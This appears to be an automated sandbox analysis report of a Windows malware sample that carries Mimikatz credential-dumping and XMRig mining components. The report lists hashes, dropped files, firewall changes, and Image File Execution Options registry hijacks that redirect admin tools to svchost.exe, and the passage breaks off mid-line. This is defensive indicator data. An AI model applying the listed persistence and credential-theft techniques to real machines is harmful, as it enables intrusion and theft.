Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
16-11-2024 02:15
Behavioral task
behavioral1
Sample
3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe
Resource
win10v2004-20241007-en
General
-
Target
3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe
-
Size
9.2MB
-
MD5
9aa307bf17ed00c9228c8e34433ed6b0
-
SHA1
0bd67d97a100efd3245eec2fe0d7169e761ebdaf
-
SHA256
3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643e
-
SHA512
c501a220d53f4b1abab239bb2c3c57a2137afc3bbbe074aa5504ae71c007d17acc9901eabbdefd914be8e0bd322997a41f39f7ef0b52e3d37a8b810fb5591d4e
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2760 created 928 2760 jkdzukl.exe 17 -
Xmrig family
-
Contacts a large (2062) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 7 IoCs
resource yara_rule behavioral1/memory/3040-189-0x000000013F130000-0x000000013F250000-memory.dmp xmrig behavioral1/memory/3040-200-0x000000013F130000-0x000000013F250000-memory.dmp xmrig behavioral1/memory/3040-218-0x000000013F130000-0x000000013F250000-memory.dmp xmrig behavioral1/memory/3040-219-0x000000013F130000-0x000000013F250000-memory.dmp xmrig behavioral1/memory/3040-220-0x000000013F130000-0x000000013F250000-memory.dmp xmrig behavioral1/memory/3040-221-0x000000013F130000-0x000000013F250000-memory.dmp xmrig behavioral1/memory/3040-237-0x000000013F130000-0x000000013F250000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 7 IoCs
resource yara_rule behavioral1/memory/2796-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/memory/2796-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/files/0x0008000000015ed2-5.dat mimikatz behavioral1/memory/2604-9-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral1/memory/2484-134-0x0000000001020000-0x000000000110E000-memory.dmp mimikatz behavioral1/memory/2340-138-0x000000013F240000-0x000000013F32E000-memory.dmp mimikatz behavioral1/memory/2760-182-0x00000000028D0000-0x000000000292B000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts jkdzukl.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe jkdzukl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe jkdzukl.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2424 netsh.exe 1100 netsh.exe -
Executes dropped EXE 16 IoCs
pid Process 2604 jkdzukl.exe 2760 jkdzukl.exe 2992 wpcap.exe 944 bplpyetka.exe 2340 vfshost.exe 1992 xohudmc.exe 2656 sssscc.exe 1448 zukyhlbkc.exe 3040 bepcel.exe 2796 zukyhlbkc.exe 1764 zukyhlbkc.exe 2136 zukyhlbkc.exe 2920 jkdzukl.exe 1284 zukyhlbkc.exe 600 zukyhlbkc.exe 1068 npzlubcbh.exe -
Loads dropped DLL 23 IoCs
pid Process 2724 cmd.exe 2724 cmd.exe 2960 cmd.exe 2992 wpcap.exe 2992 wpcap.exe 2992 wpcap.exe 2992 wpcap.exe 2992 wpcap.exe 2940 cmd.exe 944 bplpyetka.exe 944 bplpyetka.exe 2484 cmd.exe 2484 cmd.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2760 jkdzukl.exe 2536 cmd.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ifconfig.me 18 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 12 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat jkdzukl.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\sssscc.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\sssscc.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 jkdzukl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 jkdzukl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 jkdzukl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 jkdzukl.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe -
resource yara_rule behavioral1/files/0x0005000000019640-132.dat upx behavioral1/memory/2340-136-0x000000013F240000-0x000000013F32E000-memory.dmp upx behavioral1/memory/2340-138-0x000000013F240000-0x000000013F32E000-memory.dmp upx behavioral1/files/0x0005000000019c6c-158.dat upx behavioral1/memory/1448-162-0x000000013F9F0000-0x000000013FA4B000-memory.dmp upx behavioral1/files/0x0005000000019c87-164.dat upx behavioral1/memory/3040-168-0x000000013F130000-0x000000013F250000-memory.dmp upx behavioral1/memory/1448-173-0x000000013F9F0000-0x000000013FA4B000-memory.dmp upx behavioral1/memory/2760-176-0x0000000001A50000-0x0000000001AAB000-memory.dmp upx behavioral1/memory/2796-180-0x000000013FB70000-0x000000013FBCB000-memory.dmp upx behavioral1/memory/2760-184-0x0000000001A50000-0x0000000001AAB000-memory.dmp upx behavioral1/memory/3040-189-0x000000013F130000-0x000000013F250000-memory.dmp upx behavioral1/memory/1764-190-0x000000013F6C0000-0x000000013F71B000-memory.dmp upx behavioral1/memory/2136-195-0x000000013FE80000-0x000000013FEDB000-memory.dmp upx behavioral1/memory/3040-200-0x000000013F130000-0x000000013F250000-memory.dmp upx behavioral1/memory/2136-202-0x000000013FE80000-0x000000013FEDB000-memory.dmp upx behavioral1/memory/1284-207-0x000000013FB40000-0x000000013FB9B000-memory.dmp upx behavioral1/memory/1284-209-0x000000013FB40000-0x000000013FB9B000-memory.dmp upx behavioral1/memory/2760-212-0x0000000001A50000-0x0000000001AAB000-memory.dmp upx behavioral1/memory/600-216-0x000000013F7D0000-0x000000013F82B000-memory.dmp upx behavioral1/memory/3040-218-0x000000013F130000-0x000000013F250000-memory.dmp upx behavioral1/memory/3040-219-0x000000013F130000-0x000000013F250000-memory.dmp upx behavioral1/memory/3040-220-0x000000013F130000-0x000000013F250000-memory.dmp upx behavioral1/memory/3040-221-0x000000013F130000-0x000000013F250000-memory.dmp upx behavioral1/memory/3040-237-0x000000013F130000-0x000000013F250000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\lybbulqql\UnattendGC\specials\coli-0.dll jkdzukl.exe File opened for modification C:\Windows\eujkczal\vimpcsvc.xml jkdzukl.exe File opened for modification C:\Windows\eujkczal\schoedcl.xml jkdzukl.exe File opened for modification C:\Windows\lybbulqql\Corporate\log.txt cmd.exe File created C:\Windows\eujkczal\docmicfg.xml jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\cnli-1.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\libeay32.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\spoolsrv.xml jkdzukl.exe File opened for modification C:\Windows\eujkczal\svschost.xml jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\schoedcl.xml jkdzukl.exe File created C:\Windows\eujkczal\vimpcsvc.xml jkdzukl.exe File created C:\Windows\eujkczal\schoedcl.xml jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\AppCapture64.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\exma-1.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\ssleay32.dll jkdzukl.exe File created C:\Windows\lybbulqql\jjbznblsb\ip.txt jkdzukl.exe File created C:\Windows\eujkczal\jkdzukl.exe 3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe File opened for modification C:\Windows\lybbulqql\jjbznblsb\Packet.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\spoolsrv.exe jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\Shellcode.ini jkdzukl.exe File created C:\Windows\lybbulqql\jjbznblsb\scan.bat jkdzukl.exe File created C:\Windows\lybbulqql\Corporate\vfshost.exe jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\libxml2.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\svschost.xml jkdzukl.exe File created C:\Windows\lybbulqql\Corporate\mimidrv.sys jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\tibe-2.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\trfo-2.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\ucl.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\schoedcl.exe jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\docmicfg.xml jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\schoedcl.xml jkdzukl.exe File opened for modification C:\Windows\eujkczal\spoolsrv.xml jkdzukl.exe File created C:\Windows\lybbulqql\jjbznblsb\Packet.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\trch-1.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\vimpcsvc.exe jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\vimpcsvc.xml jkdzukl.exe File created C:\Windows\lybbulqql\upbdrjv\swrpwe.exe jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\svschost.xml jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\docmicfg.xml jkdzukl.exe File opened for modification C:\Windows\lybbulqql\jjbznblsb\Result.txt npzlubcbh.exe File opened for modification C:\Windows\eujkczal\jkdzukl.exe 3ed73cd4f3be4e71ca64e0bb201552f999724cb980a6b14a6507929dee01643eN.exe File created C:\Windows\lybbulqql\jjbznblsb\npzlubcbh.exe jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\xdvl-0.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\zlib1.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\spoolsrv.xml jkdzukl.exe File created C:\Windows\lybbulqql\Corporate\mimilib.dll jkdzukl.exe File created C:\Windows\lybbulqql\jjbznblsb\bplpyetka.exe jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\svschost.exe jkdzukl.exe File opened for modification C:\Windows\eujkczal\docmicfg.xml jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\AppCapture32.dll jkdzukl.exe File created C:\Windows\ime\jkdzukl.exe jkdzukl.exe File created C:\Windows\lybbulqql\jjbznblsb\wpcap.exe jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\crli-0.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\docmicfg.exe jkdzukl.exe File created C:\Windows\eujkczal\spoolsrv.xml jkdzukl.exe File created C:\Windows\lybbulqql\jjbznblsb\wpcap.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\posh-0.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\tucl-1.dll jkdzukl.exe File created C:\Windows\lybbulqql\UnattendGC\specials\vimpcsvc.xml jkdzukl.exe File created C:\Windows\eujkczal\svschost.xml jkdzukl.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2652 sc.exe 2940 sc.exe 964 sc.exe 1748 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bplpyetka.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sssscc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jkdzukl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 